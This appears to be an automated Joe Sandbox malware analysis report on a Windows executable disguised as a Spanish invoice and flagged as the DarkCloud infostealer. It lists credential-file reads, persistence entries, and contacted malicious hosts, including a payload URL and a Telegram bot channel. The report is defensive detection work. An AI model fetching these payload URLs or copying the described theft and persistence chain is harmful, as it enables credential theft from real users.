                  Source: Yara matchFile source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Factura modificada____678979879.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WrappedObject.exe PID: 5784, type: MEMORYSTR
                  Yara detected Generic Dropper
                  Source: Yara matchFile source: Process Memory Space: Factura modificada____678979879.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WrappedObject.exe PID: 5784, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                  Remote Access Functionality

                  barindex
                  Yara detected DarkCloud
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.3ef3468.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Factura modificada____678979879.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WrappedObject.exe PID: 5784, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts1
                  Windows Management Instrumentation                  		111
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Obfuscated Files or Information                  		LSASS Memory12
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Software Packing                  		Security Account Manager21
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron21
                  Registry Run Keys / Startup Folder                  		21
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557403 Sample: Factura modificada____67897... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 41 karmanorbuling.org 2->41 43 showip.net 2->43 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 12 other signatures 2->55 8 Factura modificada____678979879.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        15 fitfulness.exe 4 2->15         started        17 fitfulness.exe 2->17         started        signatures3 process4 dnsIp5 47 karmanorbuling.org 218.208.91.137, 443, 49699, 49700 TMNET-AS-APTMNetInternetServiceProviderMY Malaysia 8->47 35 C:\Users\user\AppData\...\WrappedObject.exe, PE32 8->35 dropped 37 C:\...\WrappedObject.exe:Zone.Identifier, ASCII 8->37 dropped 39 C:\Users\user\AppData\...\WrappedObject.vbs, ASCII 8->39 dropped 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->63 19 InstallUtil.exe 1 21 8->19         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->65 24 WrappedObject.exe 14 2 13->24         started        26 conhost.exe 15->26         started        28 conhost.exe 17->28         started        file6 signatures7 process8 dnsIp9 45 showip.net 162.55.60.2, 49742, 49974, 80 ACPCA United States 19->45 33 C:\Users\user\AppData\...\fitfulness.exe, PE32 19->33 dropped 57 Writes or reads registry keys via WMI 19->57 59 Multi AV Scanner detection for dropped file 24->59 61 Machine Learning detection for dropped file 24->61 30 InstallUtil.exe 24->30         started        file10 signatures11 process12 signatures13 67 Tries to harvest and steal browser information (history, passwords, etc) 30->67

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Factura modificada____678979879.exe58%ReversingLabsWin32.Trojan.Leonem
                  Factura modificada____678979879.exe64%VirustotalBrowse
                  Factura modificada____678979879.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\WrappedObject.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\WrappedObject.exe58%ReversingLabsWin32.Trojan.Leonem

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://showip.netsr0%Avira URL Cloudsafe
                  https://bulk-operations.net/pricing.0%Avira URL Cloudsafe
                  https://dapper-plus.net/pricing.0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/include-graph).0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/)0%Avira URL Cloudsafe
                  http://showip.netD20%Avira URL Cloudsafe
                  https://entityframework-extensions.net/pricing.0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/md5-exception0%Avira URL Cloudsafe
                  https://karmanorbuling.org/Ggclxuylpwh.mp30%Avira URL Cloudsafe
                  https://dapper-plus.net/getting-started-mapping#instance-context-mapping.0%Avira URL Cloudsafe
                  http://karmanorbuling.org0%Avira URL Cloudsafe
                  https://dapper-plus.net/getting-started-mapping#instance-context-mapping0%Avira URL Cloudsafe
                  http://karmanorbuling.org/Ggclxuylpwh.mp30%Avira URL Cloudsafe
                  http://showip.net/aProgramFiles0%Avira URL Cloudsafe
                  https://linqtosql-plus.net/pricing.0%Avira URL Cloudsafe
                  http://entityframework-plus.net/0%Avira URL Cloudsafe
                  https://karmanorbuling.org0%Avira URL Cloudsafe
                  https://dapper-plus.net7https://bulk-operations.net0%Avira URL Cloudsafe
                  http://showip.netll0%Avira URL Cloudsafe
                  http://showip.net/u%/0%Avira URL Cloudsafe
                  http://showip.net/&0%Avira URL Cloudsafe
                  http://showip.net/ta0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  showip.net
                  		162.55.60.2
                  		truefalse
                    		high
                    karmanorbuling.org
                    		218.208.91.137
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://karmanorbuling.org/Ggclxuylpwh.mp3true
                      • Avira URL Cloud: safe
                      		unknown
                      http://karmanorbuling.org/Ggclxuylpwh.mp3true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://entityframework-extensions.net/md5-exceptionFactura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://showip.netsrInstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1InstallUtil.exe, 00000004.00000002.2549138176.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2549138176.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2549700595.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001319000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2551127147.0000000004846000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2551091737.0000000004840000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2549708231.000000000134A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://dapper-plus.net/getting-started-mapping#instance-context-mapping.Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJFactura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/botFactura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://dapper-plus.net/pricing.Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                		high
                                https://github.com/mgravell/protobuf-netFactura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://entityframework-extensions.net/)Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://showip.netD2InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://bulk-operations.net/pricing.Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://entityframework-extensions.net/include-graph).Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://entityframework-extensions.net/pricing.Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://karmanorbuling.orgFactura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://showip.net/InstallUtil.exe, 00000004.00000002.2547967703.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://showip.netInstallUtil.exe, 00000004.00000002.2547967703.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://dapper-plus.net/getting-started-mapping#instance-context-mappingFactura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://showip.netllInstallUtil.exe, 00000004.00000002.2547967703.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://linqtosql-plus.net/pricing.Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-netiFactura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/11564914/23354;Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/2152978/23354Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://showip.net/aProgramFilesInstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://karmanorbuling.orgFactura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://entityframework-plus.net/Factura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://showip.net/u%/InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dapper-plus.net7https://bulk-operations.netFactura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/npgsql/npgsql/issues/2623#issuecomment-6276222151OopsFactura modificada____678979879.exe, WrappedObject.exe.1.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFactura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://showip.net/taInstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://showip.net/&InstallUtil.exe, 0000000B.00000002.2547970076.00000000012FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                218.208.91.137
                                                		karmanorbuling.orgMalaysia
                                                		4788TMNET-AS-APTMNetInternetServiceProviderMYtrue
                                                162.55.60.2
                                                		showip.netUnited States
                                                		35893ACPCAfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1557403
                                                Start date and time:2024-11-18 08:29:11 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Factura modificada____678979879.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@12/11@2/2
                                                EGA Information:
                                                • Successful, ratio: 16.7%
                                                HCA Information:
                                                • Successful, ratio: 88%
                                                • Number of executed functions: 166
                                                • Number of non-executed functions: 6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Factura modificada____678979879.exe, PID 7780 because it is empty
                                                • Execution Graph export aborted for target InstallUtil.exe, PID 8072 because it is empty
                                                • Execution Graph export aborted for target WrappedObject.exe, PID 5784 because it is empty
                                                • Execution Graph export aborted for target fitfulness.exe, PID 3452 because it is empty
                                                • Execution Graph export aborted for target fitfulness.exe, PID 7736 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:30:09API Interceptor55x Sleep call for process: Factura modificada____678979879.exe modified
                                                04:09:50API Interceptor155x Sleep call for process: WrappedObject.exe modified
                                                08:30:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs
                                                10:09:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce flammigerous C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe
                                                10:10:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce flammigerous C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                218.208.91.137Factura para el pago 07848956897.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  Facturas 768912567845.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    4323432-3434-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      657894-02-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        SecuriteInfo.com.Trojan.Mardom.MN.9.16412.28175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          transfer - 7678-7689926398.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            Transfer-Factura-6556542248.263.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              Transfer - 89905445-04T142248.263.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                Factura-24076787026878.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  Documentos_de_env#U00edo_de_DHL_pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    162.55.60.2Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    • showip.net/
                                                                    Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • showip.net/
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • showip.net/
                                                                    FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    7rxE4s9EEG.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    fS5TEjVseD.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/
                                                                    Nvojocm.exeGet hashmaliciousDarkCloudBrowse
                                                                    • showip.net/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    showip.netPago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    7rxE4s9EEG.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    fS5TEjVseD.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    Nvojocm.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TMNET-AS-APTMNetInternetServiceProviderMYbotx.x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 219.93.18.47
                                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.9.41.171
                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 175.140.207.86
                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 144.177.101.118
                                                                    mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                    • 219.92.13.25
                                                                    75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                    • 219.92.13.25
                                                                    sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 124.13.89.28
                                                                    sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 202.188.165.137
                                                                    sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 23.51.50.86
                                                                    x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                                    • 60.49.58.128
                                                                    ACPCAdhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.215.33
                                                                    Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.211.143
                                                                    Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 162.55.60.2
                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 162.52.29.90
                                                                    http://www.skyunitedlc.comGet hashmaliciousUnknownBrowse
                                                                    • 162.0.217.112
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 162.55.60.2
                                                                    Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.211.143

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0eDHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                    • 218.208.91.137
                                                                    XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                    • 218.208.91.137
                                                                    5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                    • 218.208.91.137
                                                                    Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                    • 218.208.91.137
                                                                    XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                    • 218.208.91.137
                                                                    5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                    • 218.208.91.137
                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                    • 218.208.91.137
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 218.208.91.137
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                    • 218.208.91.137
                                                                    rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 218.208.91.137

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeLista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                      ORDER REF_47806798 .exeGet hashmaliciousXWormBrowse
                                                                        chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                                                          Bank Details.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                            Signed Document..exeGet hashmaliciousRemcos, DarkTortilla, PureLog StealerBrowse
                                                                              PO CONTRACT.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                image.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                  ABA NEW ORDER No.2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                                                                                    09099627362726.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exeGet hashmaliciousDarkTortilla, XWormBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fitfulness.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe
                                                                                        File Type:CSV text
